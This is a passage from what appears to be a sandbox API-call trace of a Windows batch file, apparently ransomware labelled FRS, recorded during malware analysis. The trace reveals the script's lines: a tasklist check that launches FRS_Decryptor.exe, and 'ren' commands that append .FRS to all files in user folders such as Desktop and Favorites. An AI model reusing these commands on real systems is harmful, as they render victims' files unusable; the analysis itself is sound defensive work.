dwMode=0x3) returned 1 [0127.529] _get_osfhandle (_FileHandle=1) returned 0x28 [0127.529] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0127.529] _get_osfhandle (_FileHandle=0) returned 0x24 [0127.529] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0127.529] SetConsoleInputExeNameW () returned 0x1 [0127.529] GetConsoleOutputCP () returned 0x1b5 [0127.529] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0127.529] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.530] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0127.530] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0127.530] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0127.530] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0127.530] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0127.530] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0127.530] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0127.530] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0127.530] GetFileType (hFile=0x2b8) returned 0x1 [0127.530] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0127.530] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0127.530] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0127.530] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0127.530] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0127.530] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0127.530] GetFileType (hFile=0x2b8) returned 0x1 [0127.530] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0127.530] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0127.530] _tell (_FileHandle=3) returned 2627 [0127.530] _close (_FileHandle=3) returned 0 [0127.531] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0127.531] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0127.531] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0127.531] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0127.531] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0127.535] feof (_File=0x76ea4c68) returned 0 [0127.535] ferror (_File=0x76ea4c68) returned 0 [0127.535] fgets (in: _Buf=0xd81c28, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0128.020] feof (_File=0x76ea4c68) returned 0 [0128.020] ferror (_File=0x76ea4c68) returned 0 [0128.020] fgets (in: _Buf=0xd872b6, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0128.056] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0128.057] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43306, cbMultiByte=78, lpWideCharStr=0xd432b8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0128.057] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0128.057] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0128.057] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0128.058] _open_osfhandle (_OSFileHandle=0x2e8, _Flags=8) returned 3 [0128.058] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0128.058] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.058] GetFileSize (in: hFile=0x2e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0128.058] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0128.058] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0128.058] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.058] GetFileType (hFile=0x2e8) returned 0x1 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0128.058] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0128.058] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0128.058] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.058] GetFileType (hFile=0x2e8) returned 0x1 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0128.058] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0128.058] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0128.058] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.058] GetFileType (hFile=0x2e8) returned 0x1 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0128.058] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.058] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.058] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.058] GetFileType (hFile=0x2e8) returned 0x1 [0128.058] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.059] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0128.059] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0128.059] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.059] GetFileType (hFile=0x2e8) returned 0x1 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0128.059] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0128.059] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0128.059] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.059] GetFileType (hFile=0x2e8) returned 0x1 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0128.059] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0128.059] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0128.059] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.059] GetFileType (hFile=0x2e8) returned 0x1 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0128.059] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0128.059] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0128.059] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.059] GetFileType (hFile=0x2e8) returned 0x1 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0128.059] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.059] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0128.060] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0128.060] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.060] GetFileType (hFile=0x2e8) returned 0x1 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0128.060] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0128.060] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0128.060] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.060] GetFileType (hFile=0x2e8) returned 0x1 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0128.060] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0128.060] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0128.060] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.060] GetFileType (hFile=0x2e8) returned 0x1 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0128.060] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0128.060] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0128.060] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.060] GetFileType (hFile=0x2e8) returned 0x1 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0128.060] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0128.060] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0128.060] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0128.061] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.061] GetFileType (hFile=0x2e8) returned 0x1 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0128.061] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0128.061] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0128.061] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.061] GetFileType (hFile=0x2e8) returned 0x1 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0128.061] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0128.061] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0128.061] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.061] GetFileType (hFile=0x2e8) returned 0x1 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0128.061] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0128.061] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0128.061] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.061] GetFileType (hFile=0x2e8) returned 0x1 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0128.061] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0128.061] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0128.061] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.061] GetFileType (hFile=0x2e8) returned 0x1 [0128.061] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0128.062] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0128.062] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0128.062] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.062] GetFileType (hFile=0x2e8) returned 0x1 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0128.062] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0128.062] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren 